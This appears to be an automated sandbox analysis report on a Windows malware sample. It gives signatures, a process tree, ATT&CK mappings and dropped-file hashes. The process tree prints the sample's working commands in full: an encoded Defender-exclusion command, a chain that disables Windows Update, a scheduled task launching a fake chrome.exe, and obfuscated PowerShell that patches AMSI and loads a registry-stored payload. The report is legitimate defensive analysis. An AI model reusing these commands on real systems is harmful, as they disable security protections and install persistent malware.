Analysis

  • max time kernel
    48s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    05-05-2022 00:56

General

  • Target

    File.exe

  • Size

    4.0MB

  • MD5

    f74ccaec9935cca19122478058c39f79

  • SHA1

    5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527

  • SHA256

    8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a

  • SHA512

    2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 61 IoCs
  • Modifies registry key 1 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\File.exe
    "C:\Users\Admin\AppData\Local\Temp\File.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Users\Admin\AppData\Roaming\[New]344334.exe
      C:\Users\Admin\AppData\Roaming\[New]344334.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4812
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2132
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1048
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4220
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
            PID:4292
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            4⤵
              PID:540
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              4⤵
                PID:2192
              • C:\Windows\system32\sc.exe
                sc stop bits
                4⤵
                  PID:1060
                • C:\Windows\system32\sc.exe
                  sc stop dosvc
                  4⤵
                    PID:4260
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    4⤵
                    • Modifies registry key
                    PID:5096
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    4⤵
                    • Modifies registry key
                    PID:4448
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:4284
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    4⤵
                    • Modifies registry key
                    PID:1360
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    4⤵
                    • Modifies registry key
                    PID:2576
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:760
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:2624
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2112
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2128
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:2356
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  3⤵
                  • Drops file in Windows directory
                  PID:4444
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:780
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
                    4⤵
                    • Creates scheduled task(s)
                    PID:1820
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe"
                  3⤵
                    PID:1884
                    • C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                      C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                      4⤵
                        PID:2176
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
                          5⤵
                            PID:4892
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
                              6⤵
                                PID:3832
                      • C:\Users\Admin\AppData\Roaming\ger.exe
                        C:\Users\Admin\AppData\Roaming\ger.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:460
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4852
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:rGLtOhFiCmid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$IwlXkGEmwqZBmS,[Parameter(Position=1)][Type]$ghxqtBRSGB)$HYTXuBcoLdx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$HYTXuBcoLdx.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');$HYTXuBcoLdx.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ghxqtBRSGB,$IwlXkGEmwqZBmS).SetImplementationFlags('Runtime,Managed');Write-Output $HYTXuBcoLdx.CreateType();}$keeKgdZqwcuQu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$lmBRnGZddYhsRU=$keeKgdZqwcuQu.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hNATbfoaebXSkoaAPIh=rGLtOhFiCmid @([String])([IntPtr]);$kXcPDjeZCvAGqHbJmWRqdf=rGLtOhFiCmid @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kFDUHJKPfVu=$keeKgdZqwcuQu.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$sorrBYAHgsjTLX=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Load'+'LibraryA')));$XgDywUZjNrbTqCukt=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$kFDUHJKPfVu,[Object]('Vir'+'tual'+'Pro'+'tect')));$BTwuEjv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sorrBYAHgsjTLX,$hNATbfoaebXSkoaAPIh).Invoke('a'+'m'+'si.dll');$VLgICEuFpaNOwkUMk=$lmBRnGZddYhsRU.Invoke($Null,@([Object]$BTwuEjv,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VHdOFdKCSa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,4,[ref]$VHdOFdKCSa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$VLgICEuFpaNOwkUMk,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XgDywUZjNrbTqCukt,$kXcPDjeZCvAGqHbJmWRqdf).Invoke($VLgICEuFpaNOwkUMk,[uint32]8,0x20,[ref]$VHdOFdKCSa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
                      1⤵
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2872
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lidnqEOIVwEG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vNUMrRLSZXBjgG,[Parameter(Position=1)][Type]$AnHDgJfxAO)$WgstumZpaFr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$WgstumZpaFr.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');$WgstumZpaFr.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$AnHDgJfxAO,$vNUMrRLSZXBjgG).SetImplementationFlags('Runtime,Managed');Write-Output $WgstumZpaFr.CreateType();}$hBQlRohaBMdUo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$rMJmrNKHNnAqkY=$hBQlRohaBMdUo.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XhsktYzjyMofJVtXwqs=lidnqEOIVwEG @([String])([IntPtr]);$DquWmwJESRZiqJSKfIKhvr=lidnqEOIVwEG @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pUouaoPSBEI=$hBQlRohaBMdUo.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$xrMJDGyXylXHva=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Load'+'LibraryA')));$DboijGHkrpDUyNTWk=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$pUouaoPSBEI,[Object]('Vir'+'tual'+'Pro'+'tect')));$QWDsDYe=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xrMJDGyXylXHva,$XhsktYzjyMofJVtXwqs).Invoke('a'+'m'+'si.dll');$POdrWVseLQWFgGpcg=$rMJmrNKHNnAqkY.Invoke($Null,@([Object]$QWDsDYe,[Object]('Ams'+'iSc'+'an'+'Buffer')));$WedNKnyFXl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,4,[ref]$WedNKnyFXl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$POdrWVseLQWFgGpcg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DboijGHkrpDUyNTWk,$DquWmwJESRZiqJSKfIKhvr).Invoke($POdrWVseLQWFgGpcg,[uint32]8,0x20,[ref]$WedNKnyFXl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
                      1⤵
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2452
                    • C:\Windows\System32\dllhost.exe
                      C:\Windows\System32\dllhost.exe /Processid:{364bf40b-3cad-4ad6-9fa8-d40b12851d88}
                      1⤵
                        PID:2228
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -pss -s 456 -p 3308 -ip 3308
                        1⤵
                          PID:2576
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -pss -s 448 -p 1484 -ip 1484
                          1⤵
                            PID:1772
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 3308 -s 936
                            1⤵
                            • Program crash
                            PID:5112
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 1484 -s 352
                            1⤵
                            • Program crash
                            PID:3968
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 1484 -s 352
                            1⤵
                            • Program crash
                            PID:400
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 3308 -s 936
                            1⤵
                            • Program crash
                            PID:5072

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Execution

                          Scheduled Task

                          1
                          T1053

                          Persistence

                          Modify Existing Service

                          2
                          T1031

                          Scheduled Task

                          1
                          T1053

                          Privilege Escalation

                          Scheduled Task

                          1
                          T1053

                          Defense Evasion

                          Modify Registry

                          2
                          T1112

                          Impair Defenses

                          1
                          T1562

                          File Permissions Modification

                          1
                          T1222

                          Discovery

                          Query Registry

                          1
                          T1012

                          System Information Discovery

                          2
                          T1082

                          Impact

                          Service Stop

                          1
                          T1489

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER91FA.tmp.csv
                            Filesize

                            40KB

                            MD5

                            6b07ee972ebdc98c44d3e1965f2ffa49

                            SHA1

                            ebc1669edb2f015baba53179d99b6da55c888687

                            SHA256

                            f84037ed8001e4385fb6a32b66adf234aed219854ac2c972ed43b59b5f62d9a1

                            SHA512

                            4292cdd27d35afc6ea813873e3f0ad71d2cc381532a74587e0eed6d1cd04346f388f5995820c242ebd39e873efa703309076f170bdaa2c10af2df10c608d1f18

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER91FB.tmp.csv
                            Filesize

                            40KB

                            MD5

                            46a269e2d5c8e6503cedfb77eab4cab4

                            SHA1

                            b4ba2f49448f2c23afcbc188f416493e8044f1d2

                            SHA256

                            6f06baa44e15ff010913cd332ee1600a283ae22634c07ca8dba5c64106354f55

                            SHA512

                            c2f6ff7b43e86859dcf2d12c138607b9a72cd215e5892ccf4626c72be941e839b00a75fa86991cad6fd1fbb4a284c993ee28342799e7bc2bf384b8d587c5fe82

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C1.tmp.txt
                            Filesize

                            13KB

                            MD5

                            a33618cc76d6bd89f8fa377c1b98d483

                            SHA1

                            47a330f34d40bdb6a7e397406e7918bf12be0b74

                            SHA256

                            1375a574b2e13115eb9d5d3f325861100cc6022e2ad193a73d7e09ff3cd371f3

                            SHA512

                            a68bd2d37de5db575c5120612cce2ff03f805b45ba54683500f45199a2fc4702875657646136ac356b14c28e617672c952db5cbbdea26c63f417fa20a729eaa9

                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C2.tmp.txt
                            Filesize

                            13KB

                            MD5

                            49a8f78539b17863bc6e78e5364e4dac

                            SHA1

                            37d18edfa90d09491017dc7fbeeaed47949ad52f

                            SHA256

                            8dc7641b53903d5b00d43ca7239393483fb7bbef3ae7df8a40aeee98f036fa46

                            SHA512

                            5d8511772e19bba7f34421693311f20871de285273f3e15f525f8482cfe2850c24323bf17ad9bfedbdfa59273a44540280ab753b79ea11b1014989668eeb9fe3

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            Filesize

                            2KB

                            MD5

                            440cb38dbee06645cc8b74d51f6e5f71

                            SHA1

                            d7e61da91dc4502e9ae83281b88c1e48584edb7c

                            SHA256

                            8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                            SHA512

                            3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            944B

                            MD5

                            3e4d57d0f5914187ae1b311f72341c51

                            SHA1

                            4d0db398175c6d2d35774404afb8fd98071d010e

                            SHA256

                            07fbda60444acc176e8890e957c88bc21ee4abd34603a487745fcaea142bd369

                            SHA512

                            e618e578f4c1887d52feb022520ab1a4c6f3f200aeb3d3cc721ba151624fd7a60a1185a61620b629569bbcde64cf27958331baf8efd29d691dfad3a215edf1db

                          • C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                            Filesize

                            254.9MB

                            MD5

                            6893fc513fff739b36b4521285f9b800

                            SHA1

                            c7a632a7b30c7839904249d87a380d8aef44d3c0

                            SHA256

                            edbeedeec9ecb8c19b6ddd93b47968b6b2c3c6ff2a92166bf75f63a3a2749e3f

                            SHA512

                            b50acc1408a3bae46a6258447874cd1f6049923dd58311a4fed5e2038027a64fd0076078d2358c48bded153c56d7fa24fcead281d7ea6e61af1346b143413b39

                          • C:\Users\Admin\AppData\Roaming\Chrome\chrome.exe
                            Filesize

                            254.3MB

                            MD5

                            2e8a33ed06e1271a98bdd321faf83d15

                            SHA1

                            9228fee5a8fc578720727be08783333eb4442bd3

                            SHA256

                            15633232144436a7b73bc2ccb8de6e35af9e6c937eca8d8f8784dd5a5aaeeb20

                            SHA512

                            28bc04e616757e91ec2e710bd674bc06aaf1a067e4197f2ffbbf1d687fbed94e05cc61258f490b123fdb529cf37f8c91f3d8bd2f285e0debee7bb3e1c09bd3a8

                          • C:\Users\Admin\AppData\Roaming\[New]344334.exe
                            Filesize

                            487.2MB

                            MD5

                            e0384f56863ff9dade991a2585a6c743

                            SHA1

                            1e224626dabb3543da8b9d23cb390d9a3ad2341b

                            SHA256

                            af6cbf4108c25de39653bb2f7e0702cb3a9f720c3bdc074ceb784dde204c4009

                            SHA512

                            ce9bb394e76cd0c543034c821a41c7922917cb12701256a5e4f0b53bbe6814fd1f773f7469ab97090bc44058f88f11bf58358e502bbb2af9790577d605b81edd

                          • C:\Users\Admin\AppData\Roaming\[New]344334.exe
                            Filesize

                            488.9MB

                            MD5

                            6adb34f3dd9e21a3fa7e8c7ae01d51d4

                            SHA1

                            49d384bc9f55f41a04e709e853de796349d9a1cd

                            SHA256

                            92769fed01e96f67b08224816f8181cfef7c04852b7cee6d7f1bc837763bec9d

                            SHA512

                            20d1e32c98a01dae8652362c0b1737f05fb92d0109a037069e8d5c27d091b62f175082bad51f82685f8ad48277d0b5959f14d41b74bab5ad9d5401a9afe5ec7b

                          • C:\Users\Admin\AppData\Roaming\ger.exe
                            Filesize

                            1.9MB

                            MD5

                            ebc48d85bce66e7534e695c2eb990fc7

                            SHA1

                            de42ec460cbcee1d8d1629d41d0764eb16799361

                            SHA256

                            32fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c

                            SHA512

                            da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8

                          • C:\Users\Admin\AppData\Roaming\ger.exe
                            Filesize

                            1.9MB

                            MD5

                            ebc48d85bce66e7534e695c2eb990fc7

                            SHA1

                            de42ec460cbcee1d8d1629d41d0764eb16799361

                            SHA256

                            32fb10396b6c9644eff88481e1ee9cd59c16d4d19848b8d16f22fd4978d3817c

                            SHA512

                            da1f92f12c4dbeafe088308fe03b6876fe20c9fbe7b1bc0303a6be727829f476a854df7c817832dcea0fea46d1bdfb3b4da5c9168a7032320dbf937fad93ddd8

                          • memory/60-236-0x000001BC4D510000-0x000001BC4D53A000-memory.dmp
                            Filesize

                            168KB

                          • memory/60-201-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/400-305-0x000001A96D850000-0x000001A96D87A000-memory.dmp
                            Filesize

                            168KB

                          • memory/400-303-0x000001A96D7D0000-0x000001A96D7FA000-memory.dmp
                            Filesize

                            168KB

                          • memory/400-304-0x0000000000000000-mapping.dmp
                          • memory/428-249-0x000001A70E580000-0x000001A70E5AA000-memory.dmp
                            Filesize

                            168KB

                          • memory/428-226-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/444-300-0x0000028989FB0000-0x0000028989FDA000-memory.dmp
                            Filesize

                            168KB

                          • memory/444-260-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/460-141-0x0000000000950000-0x0000000000B2D000-memory.dmp
                            Filesize

                            1.9MB

                          • memory/460-133-0x0000000000000000-mapping.dmp
                          • memory/540-160-0x0000000000000000-mapping.dmp
                          • memory/620-234-0x0000027D01C40000-0x0000027D01C6A000-memory.dmp
                            Filesize

                            168KB

                          • memory/620-200-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/620-231-0x0000027D01C10000-0x0000027D01C33000-memory.dmp
                            Filesize

                            140KB

                          • memory/676-205-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/676-235-0x0000017941310000-0x000001794133A000-memory.dmp
                            Filesize

                            168KB

                          • memory/724-225-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/724-250-0x0000022C56990000-0x0000022C569BA000-memory.dmp
                            Filesize

                            168KB

                          • memory/760-179-0x0000000000000000-mapping.dmp
                          • memory/780-164-0x0000000000000000-mapping.dmp
                          • memory/960-237-0x0000028990040000-0x000002899006A000-memory.dmp
                            Filesize

                            168KB

                          • memory/960-230-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1028-227-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1028-251-0x0000014FE7500000-0x0000014FE752A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1040-228-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1040-252-0x0000021A803A0000-0x0000021A803CA000-memory.dmp
                            Filesize

                            168KB

                          • memory/1048-152-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmp
                            Filesize

                            10.8MB

                          • memory/1048-151-0x00000266C8360000-0x00000266C8382000-memory.dmp
                            Filesize

                            136KB

                          • memory/1048-149-0x0000000000000000-mapping.dmp
                          • memory/1052-275-0x0000000008500000-0x000000000852A000-memory.dmp
                            Filesize

                            168KB

                          • memory/1052-255-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1060-165-0x0000000000000000-mapping.dmp
                          • memory/1120-229-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1120-253-0x0000019EB1890000-0x0000019EB18BA000-memory.dmp
                            Filesize

                            168KB

                          • memory/1184-221-0x00007FFC95270000-0x00007FFC95280000-memory.dmp
                            Filesize

                            64KB

                          • memory/1184-314-0x0000029201580000-0x00000292015AA000-memory.dmp
                            Filesize

                            168KB

